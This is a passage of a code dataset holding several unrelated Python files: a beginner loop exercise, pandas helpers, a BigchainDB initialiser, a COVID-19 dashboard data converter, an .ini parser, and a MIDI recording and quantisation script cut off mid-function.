10\")\n x += 1\n\nfor x in range(10):\n print(x, \"is less than 10\")\n\nfor x in range(10):\n if x == 3:\n continue\n if x == 5:\n break\n print(x)\n\n\n# 2.1.14 Truthiness\none_is_less_than_two = 1 
< 2\ntrue_equals_false = (True == False)\n\nx = None\nprint(x == None)\nprint(x is None)\n\n\ndef some_function_that_returns_a_string():\n return \"test is very difficult\"\n\n\ns = some_function_that_returns_a_string()\nif s:\n first_char1 = s[0]\nelse:\n first_char1 = \"\"\n\nfirst_char2 = s and s[0]\n\nsafe_x = x or 0\n\nall([True, 1, {3}])\nall([True, 1, {}])\nany([True, 1, {}])\nall([])\nany([])\n","sub_path":"my_work/chapter2/study_python/if_then_else.py","file_name":"if_then_else.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"44009051","text":"import pandas as pd\nimport copy\nimport numpy as np \nfrom scipy.spatial.distance import euclidean\n\ndef filter_df(df,indexes):\n \"\"\"Returns a dataframe that includes info from indicated indexes\n \n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n indexes: (list of str) The list of indexes\n \"\"\"\n head = df.columns\n data = []\n for i in indexes:\n row = []\n for c in head:\n row.append(df.get_value(i,c))\n data.append(row)\n new_df = pd.DataFrame(data,columns=head)\n new_df.index = indexes\n return new_df\n\ndef redact_df(df,columns):\n \"\"\"Returns a dataframe that includes info from indicated columns\n \n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n indexes: (list of str) The list of column names\n \"\"\"\n ind = df.index\n data = []\n for c in columns:\n vert = list(df[c])\n data.append(vert)\n new_df = pd.DataFrame(data)\n new_df = new_df.transpose()\n new_df.columns = columns\n new_df.index = ind\n return new_df\n\ndef get_certain_mef(df,mef):\n \"\"\"Get certain mef or columns from a df that includes cytosolic, membrane, insoluble data\n\n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n mef: (str) The name of the mef, prefix before _cyt, _mem, _ins\n \"\"\"\n types = ['cyt','mem','ins']\n cs = [mef + '_' + t for t in types]\n return redact_df(df,cs)\n\ndef exp_err_adj(c,m,i,p_c,p_m):\n \"\"\"Experimental error adjustment\n \n Parameters:\n c = (float) Cytosolic experimental value\n m = (float) Membrane experimental value\n i = (float) Insoluble experimental value\n p_c = (float) Proportion of actual cytosolic obtained, between 0 and 1\n p_m = (float) Proportion of actual membrane obtained, between 0 and 1\n \"\"\"\n adj_c = c/p_c\n adj_m = m/p_m + (p_c-1)*adj_c\n adj_i = c + m + i - adj_c - adj_m\n\n return [adj_c,adj_m,adj_i]\n\ndef adj_df(df,mef,p_c,p_m):\n \"\"\"Adjusts the df for experimental extraction error\n \n Parameters:\n df: (Pandas DataFrame) The experimentally derived DataFrame\n mef: (str) The MEF or prefix of columns [with suffix _ins and the like]\n p_c = (float) Proportion of actual cytosolic obtained, between 0 and 1\n p_m = (float) Proportion of actual membrane obtained, between 0 and 1\n \"\"\"\n return_df = copy.deepcopy(df)\n return_df.insert(len(return_df.columns),'cyt',0)\n return_df.insert(len(return_df.columns),'mem',0)\n return_df.insert(len(return_df.columns),'ins',0)\n types = ['cyt','mem','ins']\n cols = [mef + '_' + t for t in types]\n \n for index,row in df.iterrows():\n c = float(row.get_value(cols[0]))\n m = float(row.get_value(cols[1]))\n i = float(row.get_value(cols[2]))\n c,m,i = exp_err_adj(c,m,i,p_c,p_m)\n\n return_df.loc[index,'cyt'] = c\n return_df.loc[index,'mem'] = m\n return_df.loc[index,'ins'] = i\n \n return redact_df(return_df,types)\n \ndef text_to_df(filename,index=None,sep='\\t'):\n \"\"\"Converts a text file that is delimited with 
first row being header to Pandas DataFrame\n\n Parameters:\n filename: (str) The location of the text file\n index: (str) The column that can be used as an index [Optional]\n sep: (str) The separator used in the file\n\n Returns:\n df: (Pandas Dataframe) The desired dataframe\n \"\"\"\n f = open(filename,'r')\n data = []\n head = []\n for line in f:\n line = line.rstrip()\n if len(head) == 0:\n head = line.split(sep)\n \n else:\n data.append(line.split(sep))\n\n df = pd.DataFrame(data,columns=head)\n if index != None:\n df.index = df[index]\n df.drop(index,1,inplace=True)\n\n return df\n\ndef trieuclid(df1,df2,df3):\n \"\"\"Gets a list of the perimeters of the triangle created by the gene locations of each gene in each of df1,2,3...Returns the list of distances and the ordered list of genes...MUST HAVE THE SAME MEF NAME\n\n Parameters:\n df1: (Pandas Dataframe) The first MEF DataFrame\n df2: (Pandas Dataframe) The second MEF DataFrame\n df3: (Pandas Dataframe) The third MEF DataFrame\n \"\"\"\n genes = list(df1.index)\n mef = df1.columns[0].split('_')[0] + '_' + df1.columns[0].split('_')[1]\n c = 'cyt'\n m = 'mem'\n i = 'ins'\n \n incl_dist = []\n incl_genes = []\n for g in genes:\n vecs = []\n for df in [df1,df2,df3]:\n temp = [df.loc[g,c],df.loc[g,m],df.loc[g,i]]\n temp = [float(item) for item in temp]\n vecs.append(temp)\n\n if sum(vecs[0]) != 0 and sum(vecs[1]) != 0 and sum(vecs[2]) != 0:\n v1 = vecs[0]\n v2 = vecs[1]\n v3 = vecs[2]\n incl_dist.append(euclidean(v1,v2)+euclidean(v1,v3)+euclidean(v2,v3))\n incl_genes.append(g)\n \n return incl_dist,incl_genes\n","sub_path":"basic_tools/basic_tools.py","file_name":"basic_tools.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"56865196","text":"import random\nimport logging\nimport os.path\n\nimport bigchaindb\nimport bigchaindb.config_utils\n\nfrom server.lib.models.accounts import Account\nfrom server.lib.models.assets import create_asset\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntry:\n CONFIG_FILE = os.environ['BIGCHAINDB_CONFIG']\nexcept KeyError:\n CONFIG_FILE = os.path.join(os.path.dirname(__file__), '.bigchaindb_examples')\n\nAPPS = [\n {\n 'name': 'ontherecord',\n 'num_accounts': 3,\n 'num_assets': 0,\n 'payload_func': (\n lambda x: {\n 'app': 'ontherecord',\n 'content': x\n }\n )\n },\n {\n 'name': 'sharetrader',\n 'num_accounts': 3,\n 'num_assets': 64,\n 'payload_func': (\n lambda i: {\n 'app': 'sharetrader',\n 'content': {\n 'x': int(i / 8),\n 'y': int(i % 8)\n }\n }\n )\n },\n {\n 'name': 'interledger',\n 'num_accounts': 3,\n 'num_assets': 0,\n 'payload_func': (\n lambda x: {\n 'app': 'interledger',\n 'content': x\n }\n )\n }\n]\n\n\ndef get_bigchain(conf=CONFIG_FILE):\n if os.path.isfile(conf):\n bigchaindb.config_utils.autoconfigure(filename=conf, force=True)\n\n return bigchaindb.Bigchain()\n\nbigchain = get_bigchain()\nlogging.info('INIT: bigchain initialized with database: {}'.format(bigchaindb.config['database']['name']))\n\n\ndef main():\n\n for app in APPS:\n accounts = []\n for i in range(app['num_accounts']):\n account = Account(bigchain=bigchain,\n name='account_{}'.format(i),\n db=app['name'])\n accounts.append(account)\n\n logging.info('INIT: {} accounts initialized for app: {}'.format(len(accounts), app['name']))\n\n assets = []\n for i in range(app['num_assets']):\n asset = create_asset(bigchain=bigchain,\n to=accounts[random.randint(0, app['num_accounts'] - 1)].vk,\n 
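# payload_func builds the app-specific payload for asset i\n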
payload=app['payload_func'](i))\n assets.append(asset)\n logging.info('INIT: {} assets initialized for app: {}'.format(len(assets), app['name']))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141723439","text":"#!/bin/python\n\nimport json\nimport csv\nimport os\nimport datetime\nimport collections\nfrom copy import deepcopy\n\nclass DataHandler():\n def __init__(self, patients_csvfile=None, data_summary_csvfile=None, total_sickbeds=None):\n datetime_now = datetime.datetime.now()\n self.datetime_now_str = datetime_now.strftime(\"%Y/%m/%d %H:%M\")\n\n self.start_date = None\n self.end_date = datetime_now if datetime_now.hour >= 22 else \\\n datetime_now - datetime.timedelta(days=1)\n\n self.patients_csvfile = patients_csvfile\n self.patients_data = self.__import_patients_data()\n\n self.data_summary_csvfile = data_summary_csvfile\n self.data_summary = self.__import_data_summary()\n\n self.total_patients = None\n self.total_discharges = None\n self.total_deaths = None\n self.current_inpatients = None\n self.total_sickbeds = total_sickbeds\n self.__classfy_data_summary()\n\n self.data = {\n \"patients\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"patients_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"inspections_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"age\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"sickbeds_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"main_summary\": {},\n \"querents\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"lastUpdate\": self.datetime_now_str\n }\n\n def generate_data(self):\n self.data[\"patients\"][\"data\"] = self.generate_patients()\n self.data[\"patients_summary\"][\"data\"] = self.generate_patients_summary_by_date()\n self.data[\"age\"][\"data\"] = self.generate_patients_summary_by_age()\n self.data[\"inspections_summary\"][\"data\"] = self.generate_inspections_summary()\n self.data[\"sickbeds_summary\"][\"data\"] = self.generate_sickbeds_summary()\n self.data[\"main_summary\"] = self.generate_main_summary()\n self.data[\"querents\"][\"data\"] = self.generate_querents()\n\n return self.data\n\n def generate_patients(self):\n patients = []\n for d in self.patients_data:\n p = {\n \"リリース日\": d[\"公表_年月日\"].strftime(\"%Y-%m-%d\") + \"T08:00:00\",\n \"居住地\": d[\"居住地\"],\n \"年代\": d[\"年代\"],\n \"性別\": d[\"性別\"],\n \"退院\": d[\"退院済フラグ\"],\n \"date\": d[\"公表_年月日\"].strftime(\"%Y-%m-%d\")\n }\n patients.append(p)\n\n return patients\n\n def generate_patients_summary_by_date(self):\n summary_by_date = self.__summarize_data(self.patients_data, \"公表_年月日\")\n patients_summary_by_date = self.__fill_in_zero_value_at_non_exists_date(\n summary_by_date)\n\n patients_summary = []\n for date, total in patients_summary_by_date.items():\n p = {\n \"日付\": date.strftime(\"%Y-%m-%d\"),\n \"小計\": total,\n }\n patients_summary.append(p)\n\n return patients_summary\n\n def generate_patients_summary_by_age(self):\n summary_by_age = self.__summarize_data(self.patients_data, \"年代\")\n null_data = {\"10代未満\": 0}\n for i in range(10, 110, 10):\n null_data[str(i) + \"代\"] = 0\n\n d = self.__deepmerge(null_data, summary_by_age)\n patients_summary_by_age = {\n \"10代以下\": d[\"10代\"] + d[\"10代未満\"],\n \"20代〜30代\": d[\"20代\"] + d[\"30代\"],\n \"40代〜50代\": d[\"40代\"] + 
d[\"50代\"],\n \"60代���70代\": d[\"60代\"] + d[\"70代\"],\n \"80代以上\": d[\"80代\"] + d[\"90代\"] + d[\"100代\"],\n }\n\n return patients_summary_by_age\n\n def generate_inspections_summary(self):\n inspections_summary = []\n for d in self.data_summary:\n if d[\"日付\"] <= self.end_date:\n p = {\n \"日付\": d[\"日付\"].strftime(\"%Y-%m-%d\"),\n \"小計\": d[\"検査実施件数\"]\n }\n inspections_summary.append(p)\n\n return inspections_summary\n\n def generate_sickbeds_summary(self):\n sickbeds_summary = {\n \"入院患者数\": self.current_inpatients,\n \"病床数\": self.total_sickbeds - self.current_inpatients\n }\n\n return sickbeds_summary\n\n def generate_main_summary(self):\n main_summary = {\n \"date\": self.datetime_now_str,\n \"attr\": \"累計\",\n \"value\": self.total_patients,\n \"children\": [\n {\"attr\": \"入院中\", \"value\": self.current_inpatients},\n {\"attr\": \"死亡\", \"value\": self.total_deaths},\n {\"attr\": \"退院\", \"value\": self.total_discharges},\n ]\n }\n\n return main_summary\n\n def generate_querents(self):\n querents = []\n for d in self.data_summary:\n if d[\"相談窓口相談件数\"] is not None:\n q = {\n \"日付\": d[\"日付\"].strftime(\"%Y-%m-%d\"),\n \"小計\": d[\"相談窓口相談件数\"]\n }\n querents.append(q)\n\n return querents\n\n def __import_patients_data(self):\n # 公表_年月日が空の場合はfilterする\n patients_data = list(filter(\n lambda x: len(x[\"公表_年月日\"]) != 0,\n self.__load_csvfile(self.patients_csvfile)\n ))\n\n for d in patients_data:\n d[\"公表_年月日\"] = datetime.datetime.strptime(d[\"公表_年月日\"], '%Y/%m/%d')\n\n return patients_data\n\n def __import_data_summary(self):\n data_summary = self.__load_csvfile(self.data_summary_csvfile)\n for d in data_summary:\n d[\"日付\"] = datetime.datetime.strptime(\n d[\"日付\"], \"%m月%d日\").replace(year=2020)\n d[\"検査実施件数\"] = int(d[\"検査実施件数\"] or 0)\n d[\"うち陽性\"] = int(d[\"うち陽性\"] or 0)\n d[\"相談窓口相談件数\"] = int(\n d[\"相談窓口相談件数\"]) if len(\n d[\"相談窓口相談件数\"]) != 0 else None\n d[\"退院\"] = int(d[\"退院\"] or 0)\n d[\"死亡\"] = int(d[\"死亡\"] or 0)\n\n start_date = data_summary[-1][\"日付\"] + datetime.timedelta(days=1)\n for date in self.__daterange(start_date, self.end_date):\n data_summary.append({\n \"日付\": date,\n \"検査実施件数\": 0,\n \"うち陽性\": 0,\n \"相談窓口相談件数\": None,\n \"退院\": 0,\n \"死亡\": 0\n })\n\n return data_summary\n\n def __load_csvfile(self, csvfile, encoding='utf_8_sig'):\n json_list = []\n with open(csvfile, 'r', encoding=encoding) as f:\n for row in csv.DictReader(f):\n json_list.append(row)\n\n return json.loads(json.dumps(json_list))\n\n def __summarize_data(self, data, key):\n counter = [d[key] for d in data]\n summary = {}\n for val, total in collections.Counter(counter).items():\n summary[val] = total\n\n return summary\n\n def __fill_in_zero_value_at_non_exists_date(self, summary_by_date):\n start_date = list(summary_by_date.keys())[0]\n null_date = dict.fromkeys(\n self.__daterange(\n start_date, self.end_date), 0)\n\n return self.__deepmerge(null_date, summary_by_date)\n\n def __classfy_data_summary(self):\n self.total_patients = sum([d[\"うち陽性\"] for d in self.data_summary])\n self.total_discharges = sum([d[\"退院\"] for d in self.data_summary])\n self.total_deaths = sum([d[\"死亡\"] for d in self.data_summary])\n\n self.current_inpatients = self.total_patients - \\\n self.total_discharges - self.total_deaths\n\n def __deepmerge(self, src, update):\n result = deepcopy(src)\n for k, v in update.items():\n if k in result and isinstance(result[k], dict):\n result[k] = self.__deepmerge(result[k], v)\n else:\n result[k] = deepcopy(v)\n return result\n\n def __daterange(self, start_date, end_date):\n 
for n in range((end_date - start_date).days + 1):\n yield start_date + datetime.timedelta(n)\n\n","sub_path":"tool/convert/modules/DataHandler.py","file_name":"DataHandler.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"568583316","text":"\"\"\"\nfrom: https://bitbucket.org/maascamp/pyconfigini/src/f2b0f95b53d5/pyconfigini.py?at=default\n\nAn .ini file parser that follows the same rules as Zend_Config_Ini\n(see http://framework.zend.com/manual/en/zend.config.adapters.ini.html\nfor details) with the exception that the comment character is '#'\ninstead of ';'.\n\nValues are converted to Python types where possible and returned as \nstrings otherwise (i.e. 834 will convert to an int, but /some/path\nwill convert to a string).\n\nLines beginning with '#' are treated as comments and will be ignored.\n\"\"\"\nimport re\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom ast import literal_eval\n\n__all__ = ['parse_ini']\n\ndefault = '__default__'\n\nreg_sec = re.compile('\\[\\s?([\\w]+)\\s?\\]', re.IGNORECASE)\nreg_isec = re.compile('\\[\\s?([\\w]+)\\s?:\\s?([\\w]+)\\s?\\]', re.IGNORECASE)\n\ndef parse_ini(ini_path, env=None):\n \n ini = _Obj({default: _Obj()})\n current_section = default\n with open(ini_path) as f:\n for line in f:\n line = line.strip()\n if not line or line.isspace() or line[0] == '#': continue\n if line[0] == '[':\n res = reg_sec.search(line)\n if res is not None:\n section = res.group(1)\n ini[section] = deepcopy(ini[default])\n else:\n res = reg_isec.search(line)\n if res is None:\n raise SyntaxError('Invalid section declaration.')\n section = res.group(1)\n parent = res.group(2)\n if parent not in ini:\n raise MissingSectionError(\"'%s' inherits from '%s' which hasn't been declared.\" % (section, parent))\n ini[section] = deepcopy(ini[parent])\n current_section = section\n else:\n pieces = line.split('=', 1)\n vals = pieces[0].strip().split('.')\n vals.reverse()\n data = _cast(pieces[1].strip())\n working_obj = ini[current_section]\n while vals:\n if len(vals) == 1:\n working_obj[vals.pop()] = data\n else:\n val = vals.pop()\n if val not in working_obj:\n working_obj[val] = _Obj()\n working_obj = working_obj[val]\n \n if env is not None:\n if env not in ini:\n raise MissingSectionError('The section being loaded does not exist.')\n return ini[env]\n return ini\n\ndef _cast(val):\n try:\n val = literal_eval(val)\n except:\n pass\n return val\n \nclass _Obj(OrderedDict):\n \"\"\" A dict that allows for object-like property access syntax.\n \"\"\"\n def __copy__(self):\n data = self.__dict__.copy()\n return _Obj(data)\n \n def __getattr__(self, name):\n try:\n return self[name]\n except KeyError:\n try:\n return self[default][name]\n except KeyError:\n raise AttributeError(name)\n\nclass MissingSectionError(Exception):\n \"\"\" Thrown when a section header inherits from a section\n that has yet been undeclared.\n \"\"\"","sub_path":"mamba/config/pyconfigini.py","file_name":"pyconfigini.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391952573","text":"from __future__ import print_function\r\n\r\nimport os\r\nimport sys\r\nimport mido\r\nimport time\r\nimport math\r\nimport datetime\r\nimport threading\r\nimport collections\r\nimport MusicTheory\r\n\r\n\r\nclass RecordMidi : \r\n\r\n def __init__ ( self ) : \r\n self.messagesFromMidiInstrument = {} \r\n 
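# raw note_on/note_off events captured from the MIDI port, in arrival order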
self.midiMessagesNoOverlaps = {} \r\n self.midiMessages = {} \r\n self.initialClk = 0\r\n self.phraseLength = 4\r\n \r\n\r\n\r\n self.tsInfo = { 'tsNumerator': 4, 'tsDenominator': 4, 'measureLength': 1920, 'resolution': 480, 'format':0 , 'bpm': 120 } \r\n\r\n self.oneBeatInSeconds = 60.0 / self.tsInfo['bpm'] \r\n self.oneBeatInMilliSeconds = round ( self.oneBeatInSeconds*1000, 3 ) \r\n \r\n\r\n self.quarterNoteInBeats = float ( ( (1/4.0) ) / (1.0/self.tsInfo['tsDenominator']) ) \r\n self.quarterNoteInSeconds = self.quarterNoteInBeats * self.oneBeatInSeconds \r\n self.quarterNoteInMilliSeconds = round ( self.quarterNoteInSeconds*1000, 3 ) \r\n\r\n # resolution = ppq = pulses per quarter note = ticks per quarter note\r\n self.oneTickInSeconds = round ( ( self.quarterNoteInSeconds / 480 ) , 7 )\r\n self.oneTickInMilliSeconds = round ( self.oneTickInSeconds*1000, 3 ) \r\n \r\n print ( \"1 Tick in Seconds: \", self.oneTickInSeconds ) \r\n print ( \"1 Tick in Milli Seconds: \", self.oneTickInMilliSeconds ) \r\n\r\n\r\n self.oneSecondInTicks = round ( 1.0/self.oneTickInSeconds, 0 ) \r\n self.oneMilliSecondInTicks = round ((1.0/self.oneTickInMilliSeconds), 2 ) \r\n\r\n\r\n print ( \"1 Second in Ticks: \", self.oneSecondInTicks ) \r\n print ( \"1 Milli Seconds in Ticks: \", self.oneMilliSecondInTicks ) \r\n \r\n self.ticksForPhraseLength = self.tsInfo['measureLength'] * self.phraseLength\r\n self.secondsForPhraseLength = int ( self.ticksForPhraseLength * self.oneTickInSeconds )\r\n \r\n print ( \"Phrase Length: \", self.phraseLength, \"Num Seconds for Phrase: \", self.secondsForPhraseLength ) \r\n\r\n #sys.exit(0) \r\n\r\n\r\n def run ( self ) : \r\n print ( \"Initial Clock: \", self.initialClk ) \r\n \r\n\r\n mido.set_backend('mido.backends.rtmidi')\r\n inport = mido.open_input()\r\n\r\n print ( \"Time: \", time.time() ) \r\n\r\n\r\n try:\r\n initialNotePlayed = False\r\n numNotes = 0 \r\n endRecording = False\r\n with mido.open_input() as port:\r\n print('Using {}'.format(port))\r\n\r\n print(\"Initial Clk: \", self.initialClk, \"Waiting for messages...\" ) \r\n \r\n for message in port:\r\n\r\n if ( not initialNotePlayed and message.type == 'note_on' ) : \r\n initialNotePlayed = True \r\n self.initialClk = message.time\r\n print ( \"\\nStarted Recording\" ) \r\n print(\"First Note Played, Initial Clk: \", self.initialClk ) \r\n\r\n if ( message.time - self.initialClk >= self.secondsForPhraseLength ) :\r\n print ( \"Initial Clk: \", self.initialClk, \"Current Time: \", message.time, self.phraseLength, \"measures recorded: \", \"Number of seconds recorded: \", self.secondsForPhraseLength, \"Stop Recording\" ) \r\n endRecording = True\r\n break \r\n\r\n\r\n print ( message ) \r\n if ( message.type == 'note_on' or message.type == 'note_off' ) : \r\n if ( message.velocity == 0 ) : \r\n self.messagesFromMidiInstrument[numNotes] = { 'event': 'note_off', 'pitch': message.note, 'time': message.time, 'velocity': message.velocity }\r\n else :\r\n self.messagesFromMidiInstrument[numNotes] = { 'event': message.type, 'pitch': message.note, 'time': message.time, 'velocity': message.velocity }\r\n numNotes += 1\r\n \r\n\r\n\r\n\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n for note in self.messagesFromMidiInstrument : \r\n self.messagesFromMidiInstrument[note]['time'] = round ( self.messagesFromMidiInstrument[note]['time'] - self.initialClk , 4 ) \r\n self.messagesFromMidiInstrument[note]['starttick'] = round ( self.messagesFromMidiInstrument[note]['time'] * self.oneSecondInTicks, 0 ) \r\n\r\n print ( 
note, self.messagesFromMidiInstrument[note] ) \r\n\r\n \r\n #generate start and end times in ticks\r\n self.generateStartAndEndTimes() \r\n\r\n #quantize notes\r\n sixteenth = 120\r\n eighth = 240\r\n self.selfQuantizeNotes ( eighth ) \r\n self.selfQuantizeNotes ( sixteenth ) \r\n\r\n #remove overlaps\r\n self.removeOverlaps () \r\n\r\n # create Midi\r\n self.createMidi () \r\n\r\n def removeOverlaps ( self ) : \r\n \r\n\r\n length = len(self.midiMessages) \r\n overlappedIndex = [] \r\n\r\n for note in self.midiMessages : \r\n \r\n s1 = self.midiMessages[note]['starttick'] \r\n actualDuration = self.midiMessages[note]['duration'] * ( self.midiMessages[note]['velocity'] / 127.0 ) \r\n e1 = self.midiMessages[note]['starttick'] + actualDuration\r\n\r\n for nextNote in range ( note+1, length, 1 ) : \r\n\r\n s2 = self.midiMessages[nextNote]['starttick'] \r\n actualDuration = self.midiMessages[nextNote]['duration'] * ( self.midiMessages[nextNote]['velocity'] / 127.0 ) \r\n e2 = self.midiMessages[nextNote]['starttick'] + actualDuration\r\n \r\n \r\n if ( s1 <= e2 and e1 >= s2 ) : # overlap exists\r\n overlappedIndex.append ( nextNote ) \r\n \r\n \r\n overlappedIndex = list(set( overlappedIndex ) ) \r\n print() \r\n print ( \"Overlapped Index: \", overlappedIndex ) \r\n\r\n for index in sorted(overlappedIndex, reverse=True):\r\n del self.midiMessages[index]\r\n\r\n print ( \"Midi Messages after removing overlap\" ) \r\n \r\n for note in self.midiMessages : \r\n print ( note, self.midiMessages[note]['pitch'], self.midiMessages[note]['starttick'], self.midiMessages[note]['endtick'], self.midiMessages[note]['velocity'], \r\n self.midiMessages[note]['duration'], self.midiMessages[note]['measure'] )\r\n \r\n\r\n\r\n def selfQuantizeNotes ( self, ticksForQuantization ) : \r\n \r\n for note in self.midiMessages : \r\n\r\n div = self.midiMessages[note]['starttick'] // ticksForQuantization\r\n mod = self.midiMessages[note]['starttick'] % ticksForQuantization\r\n\r\n if ( mod != 0 ) : # if note does not start on a quantized note\r\n if ( mod >= ticksForQuantization/2 ) : \r\n self.midiMessages[note]['starttick'] = int((div + 1 ) * ticksForQuantization )\r\n else : \r\n self.midiMessages[note]['starttick'] = int( div * ticksForQuantization )\r\n\r\n self.midiMessages[note]['endtick'] = int(self.midiMessages[note]['starttick'] + self.midiMessages[note]['duration'])\r\n self.midiMessages[note]['measure'] = int( self.midiMessages[note]['starttick'] / self.tsInfo['measureLength'] ) + 1\r\n self.midiMessages[note]['measureGranularity'] = round ( ( float(self.midiMessages[note]['starttick']) / self.tsInfo['measureLength'] ) + 1, 2 ) \r\n\r\n \r\n print() \r\n for note in self.midiMessages : \r\n print ( note, self.midiMessages[note]['pitch'], self.midiMessages[note]['starttick'], self.midiMessages[note]['endtick'], self.midiMessages[note]['granularity'], \r\n self.midiMessages[note]['tie'], self.midiMessages[note]['velocity'], self.midiMessages[note]['duration'], self.midiMessages[note]['measure'], \r\n self.midiMessages[note]['measureGranularity'], \r\n )\r\n\r\n \r\n\r\n\r\n def createMidi ( self ) :\r\n\r\n # create notes from self.midiMessages\r\n notes = {} \r\n cnt = 0 \r\n for note in self.midiMessages : \r\n pitch = self.midiMessages[note]['pitch']\r\n starttick = self.midiMessages[note]['starttick']\r\n endtick = self.midiMessages[note]['endtick']\r\n octave = pitch // 12\r\n mod = pitch % 12\r\n notestr = MusicTheory.pitchToNotes[mod]\r\n velocity = self.midiMessages[note]['velocity']\r\n notes[cnt] = { 
'event': 'on', 'notestr': notestr, 'octave': octave, 'starttick': starttick, 'velocity': velocity, 'pitch': pitch }\r\n cnt += 1\r\n notes[cnt] = { 'event': 'off', 'notestr': notestr, 'octave': octave, 'starttick': endtick, 'velocity': 0, 'pitch': pitch }\r\n cnt += 1\r\n\r\n\r\n notes = collections.OrderedDict ( sorted ( notes.items(), key=lambda x : x[1]['starttick'] ) ) \r\n\r\n glbClk = 0 \r\n print() \r\n for key in notes : \r\n notes[key]['miditick'] = notes[key]['starttick'] - glbClk \r\n glbClk = notes[key]['starttick'] \r\n print ( key, notes[key]['notestr'], notes[key]['event'], notes[key]['miditick'], notes[key]['pitch'] ) \r\n\r\n\r\n fmt = 0\r\n fname = \"midi_export\" \r\n fnamePy = fname + \".py\" \r\n fout = open ( fnamePy, \"w\" ) \r\n\r\n fout.write ( \"import midi\\n\" ) ;\r\n fout.write ( \"# Instantiate a MIDI Pattern (contains a list of tracks)\\n\" ) ;\r\n fout.write ( \"pattern = midi.Pattern(format=%d, resolution=%d)\\n\" %(fmt, self.tsInfo['resolution']) ) ;\r\n fout.write ( \"# Instantiate a MIDI Track (contains a list of MIDI events)\\n\" ) ;\r\n fout.write ( \"track = midi.Track()\\n\" ) ;\r\n fout.write ( \"# Append the track to the pattern\\n\" ) ;\r\n fout.write ( \"pattern.append(track)\\n\" ) ;\r\n fout.write (\"# Midi Events Start Here\" ) ;\r\n fout.write ( \"\\n\" ) ;\r\n fout.write (\"# Instantiate a MIDI note on event, append it to the track\\n\" ) ;\r\n fout.write ( \"\\n\" ) ;\r\n\r\n tsDenominatorPow = int(math.log ( self.tsInfo['tsDenominator'], 2 )) ;\r\n string = \"time = midi.TimeSignatureEvent(tick=0, \" + \"data = [\" + str(self.tsInfo['tsNumerator']) + \", \" + str(tsDenominatorPow) + \", 24, 8])\" + \"\\n\" ; # 240 bpm\r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(time)\\n\" ) \r\n\r\n for i in notes : \r\n \r\n pitch = notes[i]['notestr'] + \"_\" + str(notes[i]['octave'])\r\n tick = notes[i]['miditick']\r\n velocity = notes[i]['velocity']\r\n \r\n if ( notes[i]['event'] == 'on' ) : \r\n string = \"on = midi.NoteOnEvent(tick=\" + str( tick ) + \", velocity=\" + str(velocity) + \", pitch=midi.\" + pitch + \")\\n\" \r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(on)\\n\" ) \r\n\r\n else : \r\n\r\n string = \"off = midi.NoteOffEvent(tick=\" + str( tick ) + \", velocity=\" + str(velocity) + \", pitch=midi.\" + pitch + \")\\n\" \r\n fout.write ( string ) ;\r\n fout.write ( \"track.append(off)\\n\" ) \r\n \r\n\r\n #print ( i, pitch, tick, velocity ) \r\n\r\n\r\n fout.write ( \"\\n\" ) ;\r\n fout.write (\"\\neot = midi.EndOfTrackEvent(tick=1)\" ) ;\r\n fout.write (\"\\ntrack.append(eot)\" ) ;\r\n fout.write ( \"\\n# Print out the pattern\" ) ;\r\n fout.write ( \"\\n#print pattern\" ) ;\r\n # Save the pattern to disk\r\n \r\n fout_name = fname + \".mid\" ;\r\n fout.write ( \"\\nmidi.write_midifile(\\\"%s\\\", pattern)\" %(fout_name) ) ;\r\n \r\n fout.close() ;\r\n\r\n call = \"python \" + fnamePy \r\n print ( call ) \r\n os.system ( call ) ;\r\n\r\n\r\n\r\n def generateStartAndEndTimes ( self ) : \r\n\r\n\r\n cnt = 0 \r\n length = len(self.messagesFromMidiInstrument) \r\n for note in self.messagesFromMidiInstrument : \r\n \r\n if ( self.messagesFromMidiInstrument[note]['event'] == 'note_off' ) : # ignore note off events\r\n continue\r\n\r\n for offnote in range ( note+1, length, 1 ) : \r\n \r\n if ( self.messagesFromMidiInstrument[offnote]['event'] == 'note_on' ) : # ignore note on events\r\n continue\r\n \r\n if ( self.messagesFromMidiInstrument[note]['pitch'] == self.messagesFromMidiInstrument[offnote]['pitch'] ) : 
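# found the matching note_off for this note_on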
